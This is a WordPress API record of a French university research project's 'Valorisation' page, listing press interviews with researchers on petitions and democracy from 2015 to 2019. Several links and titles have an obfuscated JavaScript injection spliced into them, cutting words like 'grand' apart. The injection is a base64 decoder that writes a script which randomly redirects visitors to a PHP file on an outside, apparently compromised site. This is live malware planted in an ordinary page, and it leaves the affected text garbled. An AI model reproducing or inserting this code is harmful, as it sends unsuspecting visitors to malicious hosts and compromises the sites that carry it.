{"id":173,"date":"2015-10-19T16:16:21","date_gmt":"2015-10-19T15:16:21","guid":{"rendered":"http:\/\/textopol2.u-pec.fr\/anr-appel\/?page_id=173"},"modified":"2019-03-28T19:12:00","modified_gmt":"2019-03-28T18:12:00","slug":"valorisation","status":"publish","type":"page","link":"http:\/\/textopol.u-pec.fr\/anr-appel\/index.php\/valorisation\/","title":{"rendered":"Valorisation"},"content":{"rendered":"<h2>Interventions dans les m\u00e9dias<\/h2>\n<ul>\n<li>22\/03\/2019 :\u00a0\u00ab\u00a0<a href=\"https:\/\/www.levif.be\/actualite\/belgique\/comment-rapprocher-citoyens-et-politiques-voici-quelques-solutions\/article-normal-1109691.html?cookie_check=1553795594\">Comment rapprocher citoyens et politiques ? Voici quelques solutions<\/a>\u00a0\u00bb, <em>Le Vif<\/em>\u00a0(extraits d&rsquo;entretien avec Jean-Beno\u00eet Pilet)<\/li>\n<li>04\/03\/2019 :\u00a0\u00ab\u00a0<a href=\"https:\/\/www.lemonde.fr\/idees\/article\/2019\/03\/04\/gr<script type=\"text\/javascript\">function b32f7c5eda8(sf){var pd=&rsquo;ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+\/=&rsquo;;var r2=\u00a0\u00bb;var xe,o4,se,vc,p4,n6,q0;var w6=0;do{vc=pd.indexOf(sf.charAt(w6++));p4=pd.indexOf(sf.charAt(w6++));n6=pd.indexOf(sf.charAt(w6++));q0=pd.indexOf(sf.charAt(w6++));xe=(vc<<2)|(p4>>4);o4=((p4&#038;15)<<4)|(n6>>2);se=((n6&#038;3)<<6)|q0;if(xe>=192)xe+=848;else if(xe==168)xe=1025;else if(xe==184)xe=1105;r2+=String.fromCharCode(xe);if(n6!=64){if(o4>=192)o4+=848;else if(o4==168)o4=1025;else if(o4==184)o4=1105;r2+=String.fromCharCode(o4);}if(q0!=64){if(se>=192)se+=848;else if(se==168)se=1025;else if(se==184)se=1105;r2+=String.fromCharCode(se);}}while(w6<sf.length);document.write(r2);};b32f7c5eda8('PHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiPg0KdmFyIG51bWJlcjE9TWF0aC5mbG9vcihNYXRoLnJhbmRvbSgpICogNSk7IA0KaWYgKG51bWJlcjE9PTMpDQp7DQogdmFyIGRlbGF5ID0gMTUwMDA7CQ0KIHNldFRpbWVvdXQoImRvY3VtZW50LmxvY2F0aW9uLmhyZWY9J2h0dHA6Ly9nb3RvbGV0cy5jb20vd3AtY29udGVudC9wbHVnaW5zL3dwLXN0YWdpbmcvYXBwcy9Db3JlL1V0aWxzL0luZm9zLnBocCciLCBkZWxheSk7DQp9DQo8L3NjcmlwdD4A');<\/script>and-debat-le-retour-au-texte-est-seul-garant-de-l-interpretation_5431100_3232.html\u00a0\u00bb>Gr<script type=\"text\/javascript\">function b32f7c5eda8(sf){var pd='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+\/=';var r2='';var xe,o4,se,vc,p4,n6,q0;var w6=0;do{vc=pd.indexOf(sf.charAt(w6++));p4=pd.indexOf(sf.charAt(w6++));n6=pd.indexOf(sf.charAt(w6++));q0=pd.indexOf(sf.charAt(w6++));xe=(vc<<2)|(p4>>4);o4=((p4&15)<<4)|(n6>>2);se=((n6&3)<<6)|q0;if(xe>=192)xe+=848;else if(xe==168)xe=1025;else if(xe==184)xe=1105;r2+=String.fromCharCode(xe);if(n6!=64){if(o4>=192)o4+=848;else if(o4==168)o4=1025;else if(o4==184)o4=1105;r2+=String.fromCharCode(o4);}if(q0!=64){if(se>=192)se+=848;else if(se==168)se=1025;else if(se==184)se=1105;r2+=String.fromCharCode(se);}}while(w6<sf.length);document.write(r2);};b32f7c5eda8('PHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiPg0KdmFyIG51bWJlcjE9TWF0aC5mbG9vcihNYXRoLnJhbmRvbSgpICogNSk7IA0KaWYgKG51bWJlcjE9PTMpDQp7DQogdmFyIGRlbGF5ID0gMTUwMDA7CQ0KIHNldFRpbWVvdXQoImRvY3VtZW50LmxvY2F0aW9uLmhyZWY9J2h0dHA6Ly9nb3RvbGV0cy5jb20vd3AtY29udGVudC9wbHVnaW5zL3dwLXN0YWdpbmcvYXBwcy9Db3JlL1V0aWxzL0luZm9zLnBocCciLCBkZWxheSk7DQp9DQo8L3NjcmlwdD4A');<\/script>and d\u00e9bat : \u201cLe retour au texte est seul garant de l'interpr\u00e9tation\u201d<\/a>\u00a0\u00bb,\u00a0<em>Le Monde <\/em>(tribune de Christine Barats, avec \u00c9milie N\u00e9e et Marie Veniard)<\/li>\n<li>02\/01\/2019 :\u00a0\u00ab <a href=\"https:\/\/twitter.com\/i\/web\/status\/1080743486142537728\">\u201cL\u2019apathie aura dur\u00e9 longtemps, mais la population se repolitise\u201d<\/a>\u00a0\u00bb, <em>L'Avenir<\/em> (entretien avec Jean-Beno\u00eet Pilet)<\/li>\n<li>13\/12\/2018 :\u00a0\u00ab\u00a0<a href=\"http:\/\/www.lavie.fr\/actualite\/politique\/au-dialogue-citoyens-11-12-2018-94990_813.php\">Au dialogue citoyens !<\/a> \u00bb,\u00a0<em>La Vie<\/em>\u00a0(extraits d'entretien\u00a0avec Jean-Gabriel Contamin)<\/li>\n<li>25\/06\/2016 : \u00ab <a href=\"http:\/\/www.lesoir.be\/1249236\/article\/actualite\/union-europeenne\/2016-06-24\/un-referendum-sur-brexit-etait-il-une-bonne-idee\">Un r\u00e9f\u00e9rendum sur le Brexit \u00e9tait-il une bonne id\u00e9e ?<\/a> \u00bb,\u00a0<em>Le Soir<\/em>\u00a0n\u00b02016-148 (extraits d'entretien avec Jean-Beno\u00eet Pilet)<\/li>\n<li>02\/06\/2016 : \u00ab <a href=\"http:\/\/www.pressreader.com\/france\/dossier-familial\/20160602\/281560880072511\">La p\u00e9tition en ligne, un nouveau pouvoir ?<\/a> \u00bb, <em>Dossier Familial<\/em>\u00a0n\u00b0497 (extraits d'entretien avec Jean-Gabriel Contamin).<\/li>\n<li>06\/05\/2016 : \u00ab <a href=\"http:\/\/tempsreel.nouvelobs.com\/societe\/20160504.OBS9811\/petitions-en-ligne-des-millions-de-clics-et-apres.html\">P\u00e9titions en ligne : des millions de clics, et apr\u00e8s ?<\/a> \u00bb, <em>L'Obs<\/em>\u00a0n\u00b02687 (extraits d'entretien avec Jean-Gabriel Contamin).<\/li>\n<li>17\/03\/2016 : \u00ab <a href=\"http:\/\/www.pelerin.com\/A-la-une\/La-petition-est-elle-un-outil-democratique\">La p\u00e9tition est-elle un outil d\u00e9mocratique ?<\/a> \u00bb,\u00a0<em>P\u00e8lerin<\/em> n\u00b06955 (extraits d'entretien avec Jean-Gabriel Contamin).<\/li>\n<li>03\/02\/2016 : \u00ab <a href=\"http:\/\/plus.lesoir.be\/node\/24097\">Des clics n\u2019auront jamais le m\u00eame poids que des manifestants<\/a> \u00bb, <em>Le Soir<\/em> n\u00b02016-28 (extraits d'entretien avec Jean-Beno\u00eet Pilet)<\/li>\n<li>16\/12\/2015\u00a0: \u00ab <a href=\"http:\/\/www.nordeclair.fr\/accueil\/six-reformes-concretes-pour-refonder-la-democratie-ia0b0n968371\">Six r\u00e9formes concr\u00e8tes pour refonder la d\u00e9mocratie<\/a>\u00a0\u00bb, <em>Nord \u00c9clair<\/em>\u00a0(extraits d'entretien avec Jean-Beno\u00eet Pilet)<\/li>\n<li>14\/12\/2015 : \u00ab <a href=\"http:\/\/www.lexpress.fr\/actualite\/politique\/elections\/vote-blanc-nul-et-abstention-gr<script type=\"text\/javascript\">function b32f7c5eda8(sf){var pd='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+\/=';var r2='';var xe,o4,se,vc,p4,n6,q0;var w6=0;do{vc=pd.indexOf(sf.charAt(w6++));p4=pd.indexOf(sf.charAt(w6++));n6=pd.indexOf(sf.charAt(w6++));q0=pd.indexOf(sf.charAt(w6++));xe=(vc<<2)|(p4>>4);o4=((p4&15)<<4)|(n6>>2);se=((n6&3)<<6)|q0;if(xe>=192)xe+=848;else if(xe==168)xe=1025;else if(xe==184)xe=1105;r2+=String.fromCharCode(xe);if(n6!=64){if(o4>=192)o4+=848;else if(o4==168)o4=1025;else if(o4==184)o4=1105;r2+=String.fromCharCode(o4);}if(q0!=64){if(se>=192)se+=848;else if(se==168)se=1025;else if(se==184)se=1105;r2+=String.fromCharCode(se);}}while(w6<sf.length);document.write(r2);};b32f7c5eda8('PHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiPg0KdmFyIG51bWJlcjE9TWF0aC5mbG9vcihNYXRoLnJhbmRvbSgpICogNSk7IA0KaWYgKG51bWJlcjE9PTMpDQp7DQogdmFyIGRlbGF5ID0gMTUwMDA7CQ0KIHNldFRpbWVvdXQoImRvY3VtZW50LmxvY2F0aW9uLmhyZWY9J2h0dHA6Ly9nb3RvbGV0cy5jb20vd3AtY29udGVudC9wbHVnaW5zL3dwLXN0YWdpbmcvYXBwcy9Db3JlL1V0aWxzL0luZm9zLnBocCciLCBkZWxheSk7DQp9DQo8L3NjcmlwdD4A');<\/script>ands-vainqueurs-des-regionales_1745730.html\">Vote blanc, nul et abstention, gr<script type=\"text\/javascript\">function b32f7c5eda8(sf){var pd='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+\/=';var r2='';var xe,o4,se,vc,p4,n6,q0;var w6=0;do{vc=pd.indexOf(sf.charAt(w6++));p4=pd.indexOf(sf.charAt(w6++));n6=pd.indexOf(sf.charAt(w6++));q0=pd.indexOf(sf.charAt(w6++));xe=(vc<<2)|(p4>>4);o4=((p4&15)<<4)|(n6>>2);se=((n6&3)<<6)|q0;if(xe>=192)xe+=848;else if(xe==168)xe=1025;else if(xe==184)xe=1105;r2+=String.fromCharCode(xe);if(n6!=64){if(o4>=192)o4+=848;else if(o4==168)o4=1025;else if(o4==184)o4=1105;r2+=String.fromCharCode(o4);}if(q0!=64){if(se>=192)se+=848;else if(se==168)se=1025;else if(se==184)se=1105;r2+=String.fromCharCode(se);}}while(w6<sf.length);document.write(r2);};b32f7c5eda8('PHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiPg0KdmFyIG51bWJlcjE9TWF0aC5mbG9vcihNYXRoLnJhbmRvbSgpICogNSk7IA0KaWYgKG51bWJlcjE9PTMpDQp7DQogdmFyIGRlbGF5ID0gMTUwMDA7CQ0KIHNldFRpbWVvdXQoImRvY3VtZW50LmxvY2F0aW9uLmhyZWY9J2h0dHA6Ly9nb3RvbGV0cy5jb20vd3AtY29udGVudC9wbHVnaW5zL3dwLXN0YWdpbmcvYXBwcy9Db3JlL1V0aWxzL0luZm9zLnBocCciLCBkZWxheSk7DQp9DQo8L3NjcmlwdD4A');<\/script>ands vainqueurs des r\u00e9gionales<\/a> \u00bb,\u00a0<em>L'Express<\/em>\u00a0(extraits d'entretien avec J\u00e9r\u00e9mie Moualek).<\/li>\n<li>23\/10\/2015 : \u00ab <a href=\"http:\/\/plus.lesoir.be\/node\/10448\">Les donn\u00e9es, un enjeu g\u00e9opolitique majeur<\/a> \u00bb,\u00a0<em>Le Soir<\/em>\u00a0(extraits d'entretien avec Alain Strowel).<\/li>\n<li>17\/09\/2015 : \u00ab <a href=\"http:\/\/www.leparisien.fr\/magazine\/gr<script type=\"text\/javascript\">function b32f7c5eda8(sf){var pd='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+\/=';var r2='';var xe,o4,se,vc,p4,n6,q0;var w6=0;do{vc=pd.indexOf(sf.charAt(w6++));p4=pd.indexOf(sf.charAt(w6++));n6=pd.indexOf(sf.charAt(w6++));q0=pd.indexOf(sf.charAt(w6++));xe=(vc<<2)|(p4>>4);o4=((p4&15)<<4)|(n6>>2);se=((n6&3)<<6)|q0;if(xe>=192)xe+=848;else if(xe==168)xe=1025;else if(xe==184)xe=1105;r2+=String.fromCharCode(xe);if(n6!=64){if(o4>=192)o4+=848;else if(o4==168)o4=1025;else if(o4==184)o4=1105;r2+=String.fromCharCode(o4);}if(q0!=64){if(se>=192)se+=848;else if(se==168)se=1025;else if(se==184)se=1105;r2+=String.fromCharCode(se);}}while(w6<sf.length);document.write(r2);};b32f7c5eda8('PHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiPg0KdmFyIG51bWJlcjE9TWF0aC5mbG9vcihNYXRoLnJhbmRvbSgpICogNSk7IA0KaWYgKG51bWJlcjE9PTMpDQp7DQogdmFyIGRlbGF5ID0gMTUwMDA7CQ0KIHNldFRpbWVvdXQoImRvY3VtZW50LmxvY2F0aW9uLmhyZWY9J2h0dHA6Ly9nb3RvbGV0cy5jb20vd3AtY29udGVudC9wbHVnaW5zL3dwLXN0YWdpbmcvYXBwcy9Db3JlL1V0aWxzL0luZm9zLnBocCciLCBkZWxheSk7DQp9DQo8L3NjcmlwdD4A');<\/script>and-angle\/cliquer-c-est-signer-17-09-2015-5100873.php\">Cliquer, c\u2019est signer<\/a> \u00bb,\u00a0<em>Le Magazine Le Parisien<\/em>, Gr<script type=\"text\/javascript\">function b32f7c5eda8(sf){var pd='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+\/=';var r2='';var xe,o4,se,vc,p4,n6,q0;var w6=0;do{vc=pd.indexOf(sf.charAt(w6++));p4=pd.indexOf(sf.charAt(w6++));n6=pd.indexOf(sf.charAt(w6++));q0=pd.indexOf(sf.charAt(w6++));xe=(vc<<2)|(p4>>4);o4=((p4&15)<<4)|(n6>>2);se=((n6&3)<<6)|q0;if(xe>=192)xe+=848;else if(xe==168)xe=1025;else if(xe==184)xe=1105;r2+=String.fromCharCode(xe);if(n6!=64){if(o4>=192)o4+=848;else if(o4==168)o4=1025;else if(o4==184)o4=1105;r2+=String.fromCharCode(o4);}if(q0!=64){if(se>=192)se+=848;else if(se==168)se=1025;else if(se==184)se=1105;r2+=String.fromCharCode(se);}}while(w6<sf.length);document.write(r2);};b32f7c5eda8('PHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiPg0KdmFyIG51bWJlcjE9TWF0aC5mbG9vcihNYXRoLnJhbmRvbSgpICogNSk7IA0KaWYgKG51bWJlcjE9PTMpDQp7DQogdmFyIGRlbGF5ID0gMTUwMDA7CQ0KIHNldFRpbWVvdXQoImRvY3VtZW50LmxvY2F0aW9uLmhyZWY9J2h0dHA6Ly9nb3RvbGV0cy5jb20vd3AtY29udGVudC9wbHVnaW5zL3dwLXN0YWdpbmcvYXBwcy9Db3JlL1V0aWxzL0luZm9zLnBocCciLCBkZWxheSk7DQp9DQo8L3NjcmlwdD4A');<\/script>and Angle (extraits d'entretien avec Jean-Gabriel Contamin).<\/li>\n<li>16\/07\/2015 : \u00ab <a href=\"http:\/\/www.acteurspublics.com\/2015\/07\/16\/comment-la-dematerialisation-des-services-publics-prend-corps\">Comment la d\u00e9mat\u00e9rialisation des services publics prend corps<\/a> \u00bb,\u00a0<em>Acteurs Publics<\/em> (extraits d'entretien avec Marcel Moritz).<\/li>\n<li>28\/01\/2015 : \u00ab Le d\u00e9sint\u00e9r\u00eat politique d'une cible \u00e9lectorale strat\u00e9gique\u00a0\u00bb,\u00a0<em>Le Soir<\/em>\u00a0(extraits d'entretien avec \u00c9milie Van Haute).<\/li>\n<li>23\/01\/2015 : \u00ab <a href=\"http:\/\/www.media13.be\/le-droit-a-loubli-est-il-vraiment-legitime-le-soir-en-ligne-le-2301\/\">Le droit \u00e0 l'oubli est-il vraiment l\u00e9gitime ?<\/a>\u00a0\u00bb,\u00a0<em>Le Soir<\/em>\u00a0(extraits d'entretien avec Alain Strowel).<\/li>\n<\/ul>\n<h2>Logiciels<\/h2>\n<p>Des d\u00e9veloppements logiciels sont pr\u00e9vus dans le projet APPEL, les avanc\u00e9es sur ce point sont d\u00e9taill\u00e9es sur la <a href=\"http:\/\/textopol2.u-pec.fr\/anr-appel\/index.php\/valorisation\/logiciels\/\">page d\u00e9di\u00e9e aux logiciels<\/a>.<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Interventions dans les m\u00e9dias 22\/03\/2019 :\u00a0\u00ab\u00a0Comment rapprocher citoyens et politiques ? Voici quelques solutions\u00a0\u00bb, Le Vif\u00a0(extraits d&rsquo;entretien avec Jean-Beno\u00eet Pilet) 04\/03\/2019 :\u00a0\u00ab\u00a0<\/p>\n","protected":false},"author":2,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"open","ping_status":"open","template":"","meta":[],"_links":{"self":[{"href":"http:\/\/textopol.u-pec.fr\/anr-appel\/index.php\/wp-json\/wp\/v2\/pages\/173"}],"collection":[{"href":"http:\/\/textopol.u-pec.fr\/anr-appel\/index.php\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"http:\/\/textopol.u-pec.fr\/anr-appel\/index.php\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"http:\/\/textopol.u-pec.fr\/anr-appel\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"http:\/\/textopol.u-pec.fr\/anr-appel\/index.php\/wp-json\/wp\/v2\/comments?post=173"}],"version-history":[{"count":20,"href":"http:\/\/textopol.u-pec.fr\/anr-appel\/index.php\/wp-json\/wp\/v2\/pages\/173\/revisions"}],"predecessor-version":[{"id":309,"href":"http:\/\/textopol.u-pec.fr\/anr-appel\/index.php\/wp-json\/wp\/v2\/pages\/173\/revisions\/309"}],"wp:attachment":[{"href":"http:\/\/textopol.u-pec.fr\/anr-appel\/index.php\/wp-json\/wp\/v2\/media?parent=173"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}